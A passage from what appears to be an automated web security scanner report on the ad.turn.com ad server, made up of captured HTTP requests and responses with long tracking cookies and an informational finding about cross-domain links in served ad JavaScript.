tJ0mQSu_lU8mDh79eASK3CzJILgeOVnPR4h-UD67rWzrCvcGN43R9JZamXPrp2SIyybD8qG64FzqzbiUeBKdjk4Q0WseETs1mstawYgQV6i3wLehxniYitFUqB0qx6n4Sx5M49jRDbG3z0fm4MYY6yOCTgcgJUotifXIPRJK_lYL5YT6meUEDXaDLls-s2N0tVF9FTqz_IvmKwsVb_AwgxfUmqv256f9FBhFz4CyJBZn9RINMKTQ3I7SD4IvpVCCi5QQeiCwAJ9mtshbXCXAmoaypZIKgDK2iZjUMEHuD9RnwyqD6Wq4bpy4mdj_D31tIFSPkJtTzkjXOkPl_cbJQJZDq2DASl7w2QDy2QYmdPtnHx9mNsQY77FlIMWTLthiL3azxi9cuGtaEnuseRERcltLCZN_0co_nleqLBgTHojRjIRAh8vFi-Kmm4PMWBGUMhX2n_owm7INZ823IXME2xcYfKsf5GA1n12R_KQ-bGhuMfAWIgr36FcFp2Kx6ETUIw9pUPtaaVCHK9LUH-pC5jIpymwqcwLl1rd5sbRVqFfW61UFG3cpiCzVVePtMQUHcLxWKuNPb9-xEnQDOfBE9jjuFfaqW11n4Z8gkAS7CDJ7RbRN2GoeGhDH7CnZm-I2pAxTWEb_rnAJ9X0-6X3tsbjmdaajFaedKpuGiqxqJvmC97USk8cC3zW6yBJ87fVsCdnN_iwA0UeJ2ZVKJC1WZQ2Cj89bgjKG60Lw4qQhUyKcqo87iqD5yFod3mdiwlNyM1oWHNqm8CvbfORytjdRjhbf7JbEIf8rssAHq7NNUrWkXWNCUV4Bx-yj0vrR0UEI6weVfp-RxkFvFbWxjVLfhsMZ5di1Y9J_ey_rda9aQ1LUtbxsDMO-voCN7QR1cLeM_diZYKaxJW8lOtL6k9WjEcr12zdJLmBkIhSDZIzszkCQ6-yypZbuQg6vaMipdlQwgBd_ulQOKnsmllfsMnlfrJRBI_W9CBMajAnCQDtZpQlmb1obfAqGpBTrEEaFD-sL-pUdmR_GMTe8_N0j; fc=y4-HEq3o_QsSZuNtsiOwrvFrllcJ9_rUQwZI9DCQgaTcpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBOBkYH-sePWOj8HY_mY9pYLM5X-u9m5dwAGrOdM8vb6gws9mbIcr60LBGz2AczjWmsVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; pf=OgjII4cHhp8HQxROAmJMEkG3BLC8eEQOeJ73B5k4FhYIHKIn0aMUCJnjty0nF6sdgjbg707c8UN19xROYfxBRPF7NLQ1XvvumSS375GpfK3B8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:44:20 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:44:20 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=WiNKvbKyz0slMFk3sihAXbZ-b-PauCFVRC4G7gFOMxa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20FKAxRbrlyXHThuNPN1jDRBvhv9srP-kTaIcRKtruz8xbA3_z4NlZPxFoPt3Uw_aRVt2Sjt4NAApGdsd_-0PEMXjE6yPZZhOyvYBhiy3zUpF9BpGxWFEALHWvTD43XAH-Iz5LxlHD6gT5P6VEiPCAVtVdA-aRZXmNDP7lSI2wQSG2w5BlZ4tc8pkIHd8H8L-xK4fm6FGNUPUMYboq088JyqQUmOopNBcLSjTKn79ZOQhTmVdbYP4bgaO9TMDasDdVqyYLZMG4wQKFopdYuz1yBk_WTcjbPN3mh6T8lt42bAGUQkq0n0yMG86X_ZGC4oqWkH26xISdXb2Czt_sqnDjr15CZdwH63dX586rlVt-rm7c-SIYtOVAAH4DJGVnLyE0x0v__lBaWO87e1AlQVl6_5QQ0XtSgyP9-pRtjKBA9Cwx-7jM7wzJ-e1KR4AWumyOFjw1q3jr96MmE73EdnErm3CsZj-9Y-IHVpkhS7eipeok16HzBI1TUzj1EOHWWsSpuj37arSozuBgqeZjp8etrKVvDX7YWXcSdD1aEDMLZlwoKqMVJJLJFDSB1wQojnNFJ5MjwaWpgyFsbfzsaKbPWXKX_vqyjA0DxMoo1UcyAMl-UwHwhiIhI6vYlDAmBKnXsfya2KjePXc1jDyJp7bZT6sDf_Pg2Vk_EWg-3dTD9pFbmyKQTjNFZ_HcWRayD9282nXEORSTSNHt8-t3oj2i7-l7s6FAXEc8n5El2XcbrTuegxVWD_jGGk22eMLPtB6OBV0D5pFleY0M_uVIjbBBIb8Yl1NWuJvdZemV_gRsyhYECTZa3gg4ITiJkOIERx75guRh2N-PAXP1mZ83CNFUeGL7kLoy5e_c7ykdku9uolxbJgtkwbjBAoWil1i7PXIGQdIp3I_PcAy51x0-dohwxyvdUa0NuxLM2XW_puxeWePm7nvKhzW7ExyTUJftqS9GRtIcJ13wOqVugrJJQWfPaDlancBmCiobpoVQZKqqN2LNQ1OWRy-25B5SDAG71c9XpuyLlqht-ajodMyqXVi1Cfn2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqGiKySwOK5UPO9vNERci_H88y9m-kicDzJgq4dJPGSTbbiTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iREZGyAk6GegiyaVz00abWV5MmZ-fZCX_Ri2brYMHscON3agSj1p78H4smnUeQN5ozThlR1suhxo400NYsRnWwGfeWiJ1TDAaZIcpAr39zh4K7iKNV7BI50YuOvYUPTO2bQN4fyQSnFcwPjfDwZbBSsvKlG8M9beE-KPzFPUMPqmUIGBYPhkAM0V8Ec3x06vwXnMZEghdsKPsk3t0o6iBE_G1l8aLmFzsHxBxhdbF6ZR4o1EH9wuuSktDFKkbQwDphyNR2A64wqbonkcOCznLneqtknJBUV5xPA0q_m72DPx4y9cGq2SxLktQ82RQAlXbMGX1RCwZTHTEb4Y-w8vIE7xMGl5n-x6_dNctsmg2y-J7Qf49je_uHiyZQMqn6iPpP_jgBwscC4H7EST9njSjKbo5GCexBy8zIAiUxdUWnERcbJbfXtPFDdQNIlc_NQAI5BaidAF8ZdcnhUhaQZx_gVZ5RM2RQt8-CrAvQ2xmPxHLQ9FNKGm_otEhAuKCCL1ldjwdZsnyHbRQCUGjlpWhpeC8HZ0E-3snipRTbrPuJEsdt04psQlUPIjPlqdKSfwBFwmJI4O6PX8YfhTcbG4AsUupIMCtW92pY93UYfQKoQ4mjJSw1EYK6cBGodjW6hazRpuuHlWJ1JvOW-l8P0HN513R9DWs1EAP8qWIguyoREoF2kJIwx2tEHiHWkjfeBxQ7gLqfeAit_JGi1bkNsJ8PFUesr06hk7Uyqkx_5wP0wx4PE6wwjYdfnQyS8aaFxnusjLISLN2TJ3jpAVRrxYR-1Hb-tqekUsOmdFYg80aMUHzn4CBhCqLcCLSjMLK4TU-9Z53UuLuuUkAzGne6G5uAuqICLaao59R2elM0Ab3c_RTt10nS35UI7kGK7NiRfcS1KCLA5KaP26BtwiskEIQOxRYF7q7Ym3aKJQG1_aVzcIVyN8_fQgL5rKKSkDVUjOglsJUKw15qNG24102XqLE0rwT-8-KwGUPdkCWjk0EEMZkr4oLeFnX1LM_f8dwx2VpKyOHrG4_glnfgAbC5ZN7Uea_4nQJkgxI_msSbb6i7wiZqum8QQelnAkUDZM4ksZGlqtmBTf9hFgjscnX-1tljCUwf0byIT-FIvcCkGvbirxHYPrnUSHgwvkcqY0-WtJOH_5_nWQIkVcp3R9pEhYWg7G; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:44:20 GMT; Path=/
Set-Cookie: fc=mVifA5qlnx6lX2ImwzpzMX_cXVrr8eT1NfXCMI4Al7g4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIgnUkppYAUkQbltLZhwP8n_AVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:44:20 GMT; Path=/
Set-Cookie: pf=P294lBz-QxnB98RkFkt5mi-n1GtfBdws-f6uEGLy9psIHKIn0aMUCJnjty0nF6sdUM6FlmDOQFfAiBBttkwsDFGI3eCmjH8oKVkEtmoU-XDB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:44:20 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:44:20 GMT
Content-Length: 10114


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
</div>\n            \n                <img border="0" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2442545&PluID=0&ord=&ord=7333695699410581065&rtu=-1">\n                \n        \n    \n        \n    \n                    \n                    \n\n\n\n\n                        <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=1&mpid=104198
...[SNIP]...

23.46. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=uVcXM6yIvX7j2eMeidIQF8a5V_TzjpZVqwZTLNVfkjpU_hRf7pGKgJjnX9jA2aaDJ7MbV9P6kqCVP7g0UHgms69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN4WptGk9EHnij-KmuGWgmGq44jHQGDLrsdmUV6C-zfBNFavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYURF3cxdhB63ePyXNa6x4KFoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk-NauV1Zwl6f2AAejC0b7-vH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRThQAIxusK7Fow09Ae66CdI15yT-MbOhaEIA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuD8thVO0TeuNI7C0sQfrvcCeDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtz0MVZOCUcSk96pPZbUcmjBAnNc9g%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681496&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663496481&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663496493&frm=1&adk=2614322350&ga_vid=256732873.1303663496&ga_sid=1303663496&ga_hid=1292892372&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=WiNKvbKyz0slMFk3sihAXbZ-b-PauCFVRC4G7gFOMxa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20FKAxRbrlyXHThuNPN1jDRBvhv9srP-kTaIcRKtruz8xbA3_z4NlZPxFoPt3Uw_aRVt2Sjt4NAApGdsd_-0PEMXjE6yPZZhOyvYBhiy3zUpF9BpGxWFEALHWvTD43XAH-Iz5LxlHD6gT5P6VEiPCAVtVdA-aRZXmNDP7lSI2wQSG2w5BlZ4tc8pkIHd8H8L-xK4fm6FGNUPUMYboq088JyqQUmOopNBcLSjTKn79ZOQhTmVdbYP4bgaO9TMDasDdVqyYLZMG4wQKFopdYuz1yBk_WTcjbPN3mh6T8lt42bAGUQkq0n0yMG86X_ZGC4oqWkH26xISdXb2Czt_sqnDjr15CZdwH63dX586rlVt-rm7c-SIYtOVAAH4DJGVnLyE0x0v__lBaWO87e1AlQVl6_5QQ0XtSgyP9-pRtjKBA9Cwx-7jM7wzJ-e1KR4AWumyOFjw1q3jr96MmE73EdnErm3CsZj-9Y-IHVpkhS7eipeok16HzBI1TUzj1EOHWWsSpuj37arSozuBgqeZjp8etrKVvDX7YWXcSdD1aEDMLZlwoKqMVJJLJFDSB1wQojnNFJ5MjwaWpgyFsbfzsaKbPWXKX_vqyjA0DxMoo1UcyAMl-UwHwhiIhI6vYlDAmBKnXsfya2KjePXc1jDyJp7bZT6sDf_Pg2Vk_EWg-3dTD9pFbmyKQTjNFZ_HcWRayD9282nXEORSTSNHt8-t3oj2i7-l7s6FAXEc8n5El2XcbrTuegxVWD_jGGk22eMLPtB6OBV0D5pFleY0M_uVIjbBBIb8Yl1NWuJvdZemV_gRsyhYECTZa3gg4ITiJkOIERx75guRh2N-PAXP1mZ83CNFUeGL7kLoy5e_c7ykdku9uolxbJgtkwbjBAoWil1i7PXIGQdIp3I_PcAy51x0-dohwxyvdUa0NuxLM2XW_puxeWePm7nvKhzW7ExyTUJftqS9GRtIcJ13wOqVugrJJQWfPaDlancBmCiobpoVQZKqqN2LNQ1OWRy-25B5SDAG71c9XpuyLlqht-ajodMyqXVi1Cfn2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqGiKySwOK5UPO9vNERci_H88y9m-kicDzJgq4dJPGSTbbiTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iREZGyAk6GegiyaVz00abWV5MmZ-fZCX_Ri2brYMHscON3agSj1p78H4smnUeQN5ozThlR1suhxo400NYsRnWwGfeWiJ1TDAaZIcpAr39zh4K7iKNV7BI50YuOvYUPTO2bQN4fyQSnFcwPjfDwZbBSsvKlG8M9beE-KPzFPUMPqmUIGBYPhkAM0V8Ec3x06vwXnMZEghdsKPsk3t0o6iBE_G1l8aLmFzsHxBxhdbF6ZR4o1EH9wuuSktDFKkbQwDphyNR2A64wqbonkcOCznLneqtknJBUV5xPA0q_m72DPx4y9cGq2SxLktQ82RQAlXbMGX1RCwZTHTEb4Y-w8vIE7xMGl5n-x6_dNctsmg2y-J7Qf49je_uHiyZQMqn6iPpP_jgBwscC4H7EST9njSjKbo5GCexBy8zIAiUxdUWnERcbJbfXtPFDdQNIlc_NQAI5BaidAF8ZdcnhUhaQZx_gVZ5RM2RQt8-CrAvQ2xmPxHLQ9FNKGm_otEhAuKCCL1ldjwdZsnyHbRQCUGjlpWhpeC8HZ0E-3snipRTbrPuJEsdt04psQlUPIjPlqdKSfwBFwmJI4O6PX8YfhTcbG4AsUupIMCtW92pY93UYfQKoQ4mjJSw1EYK6cBGodjW6hazRpuuHlWJ1JvOW-l8P0HN513R9DWs1EAP8qWIguyoREoF2kJIwx2tEHiHWkjfeBxQ7gLqfeAit_JGi1bkNsJ8PFUesr06hk7Uyqkx_5wP0wx4PE6wwjYdfnQyS8aaFxnusjLISLN2TJ3jpAVRrxYR-1Hb-tqekUsOmdFYg80aMUHzn4CBhCqLcCLSjMLK4TU-9Z53UuLuuUkAzGne6G5uAuqICLaao59R2elM0Ab3c_RTt10nS35UI7kGK7NiRfcS1KCLA5KaP26BtwiskEIQOxRYF7q7Ym3aKJQG1_aVzcIVyN8_fQgL5rKKSkDVUjOglsJUKw15qNG24102XqLE0rwT-8-KwGUPdkCWjk0EEMZkr4oLeFnX1LM_f8dwx2VpKyOHrG4_glnfgAbC5ZN7Uea_4nQJkgxI_msSbb6i7wiZqum8QQelnAkUDZM4ksZGlqtmBTf9hFgjscnX-1tljCUwf0byIT-FIvcCkGvbirxHYPrnUSHgwvkcqY0-WtJOH_5_nWQIkVcp3R9pEhYWg7G; fc=mVifA5qlnx6lX2ImwzpzMX_cXVrr8eT1NfXCMI4Al7g4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIgnUkppYAUkQbltLZhwP8n_AVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; pf=P294lBz-QxnB98RkFkt5mi-n1GtfBdws-f6uEGLy9psIHKIn0aMUCJnjty0nF6sdUM6FlmDOQFfAiBBttkwsDFGI3eCmjH8oKVkEtmoU-XDB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
